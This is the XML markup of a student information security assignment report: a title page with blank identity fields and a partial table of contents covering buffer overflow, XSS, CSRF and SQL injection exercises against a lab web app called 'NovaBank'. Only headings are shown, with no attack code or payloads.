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9F364A3" w14:textId="77777777" w:rsidR="00F7607E" w:rsidRDefault="00F7607E" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3789C754" w14:textId="77777777" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="062E9257" w14:textId="77777777" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E7F118F" w14:textId="77777777" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="514B8F28" w14:textId="77777777" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA14261" w14:textId="5B7C4746" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Information Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77130764" w14:textId="300F81FD" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Practical Assignment Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F35A29D" w14:textId="77777777" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A57BBB4" w14:textId="02C8AE27" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Stack Buffer Overflow   |   Web Application Security   |   Red Team Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C28C180" w14:textId="77777777" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C519F46" w14:textId="77777777" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16AFF4DD" w14:textId="77777777" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F135DFE" w14:textId="750993A4" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Name: ______________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCBDDB7" w14:textId="47058DBF" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Student ID: __________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3068EE8E" w14:textId="449483F2" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Course / Module: _____________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1A5EE1" w14:textId="54B6E402" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Date: 7 October 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5A3D3E" w14:textId="1FEC39BC" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="446F9C57" w14:textId="08CD948B" w:rsidR="00483AA7" w:rsidRDefault="00483AA7" w:rsidP="00483AA7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289FFCC5" w14:textId="11E9E12C" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \o "1-2" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Part 1 - Stack-Based Buffer Overflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295511 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB0D35B" w14:textId="69324657" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1.1  Objective</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295512 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A90FF7" w14:textId="3C4CE95A" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1.2  Why the program is vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295513 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED662A0" w14:textId="5448E3A8" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1.3  Stack layout and payload design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295514 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6192838B" w14:textId="76CAA4A5" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1.4  Disabling protections (lab only)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295515 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCD4928" w14:textId="4E4F6AA7" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1.5  Execution and proof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295516 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7C5F51" w14:textId="4B34C198" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1.6  Defences</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295517 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="106193D3" w14:textId="422A9074" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1.7  Note on the brief</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295518 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A70C0A0" w14:textId="40EA5685" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Part 2 - Web Application Security (NovaBank)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295519 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="229A6BBB" w14:textId="783AF1C9" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.1  Overview</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295520 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1923A1DA" w14:textId="17B66DAB" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.2  Cross-Site Scripting - Reflected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295521 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0704F586" w14:textId="46DD295A" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.3  Cross-Site Scripting - Stored</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295522 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="644BDA89" w14:textId="5CA33C7C" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.4  Cross-Site Scripting - DOM-based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295523 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0BB733" w14:textId="270FDDD9" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.5  Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295524 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="557FFBEA" w14:textId="7A6A0C35" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.6  SQL Injection - Easy (authentication bypass)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295525 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F0186D" w14:textId="66CAF3D7" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.7  SQL Injection - Intermediate (blind, boolean-based)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295526 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE5CDF5" w14:textId="04379DAF" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.8  SQL Injection - Advanced (UNION-based extraction)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc242295527 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1B3154" w14:textId="3FA99144" w:rsidR="00483AA7" w:rsidRDefault="00483AA7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2.9  Summary of defences</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
